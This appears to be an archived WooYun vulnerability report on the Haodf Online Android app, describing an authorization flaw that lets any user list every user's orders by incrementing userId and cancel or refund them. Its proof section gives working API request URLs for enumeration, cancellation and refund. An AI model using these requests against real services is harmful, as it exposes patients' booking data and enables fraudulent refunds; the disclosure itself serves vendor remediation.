当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168904

漏洞标题:安卓APP越权-可遍历任意订单并取可对任意订单进行取消和退款操作

相关厂商:好大夫在线

漏洞作者: 路人甲

提交时间:2016-01-11 10:54

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

安卓APP全部存在越权问题:
如:可遍历任意订单并取可对任意订单进行取消和退款操作

详细说明:

APP越权-可遍历任意订单并取可对任意订单进行取消和退款操作
可以通过订单列表接口 遍历userid获取全站用户订单。
然后拿到订单详情,通过userid和订单id 取消所有未支付的订单,并对已支付订单进行退款
也可以脱掉订单库。类似问题很多

漏洞证明:

userId=484579 的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=484579&p=4&currentUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
userId=4104830747 的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=4104830747&p=4&currentUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
userId=4104637443的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=4104637443&p=4&currentUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
参数不一样的只是userId userid是整型的自增主键id
拿到订单列表后通过订单id和usreid 调用该接口可取消订单
http://mobile-api.haodf.com/patientapi/reservation_submitCancelReason?os=android&app=p&n=2&m=H60-L01&v=3.4.4.2&reservOrderId=4105192758&s=hd&di=866568025527689&deviceToken=866568025527689&userId=3854544224&p=4&currentUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2&
退款接口:
http://mobile-api.haodf.com/patientapi/reservation_submitCancelReason?os=android&app=p&desc=%E5%8E%BB%E5%8E%BB%E5%8E%BB%0A%E5%88%9A%E5%93%88%E6%9B%B4%E5%A5%BD%E4%B8%AA%E5%92%AF%E5%95%A6%E5%92%AF%E5%95%A6%E5%92%AF%E4%BA%86%E4%BC%9A%E5%93%88%E6%9B%B4%E4%B8%AA%E5%92%AF%E5%95%A6%E5%92%AF%E5%95%A6%E5%92%AF%0A%0A&n=2&m=H60-L01&v=3.4.4.2&reservOrderId=3938638716&s=hd&di=866568025527689&deviceToken=866568025527689&userId=3854544224&p=4&currentUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2&

111111.png

22222222.png

33333333333.png

44444444444.png

5555555555.png


修复方案:

增加接口访问权限验证,或者加密传输数据

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-11 16:21

厂商回复:

感谢提交,正安排工程师修复。

最新状态:

暂无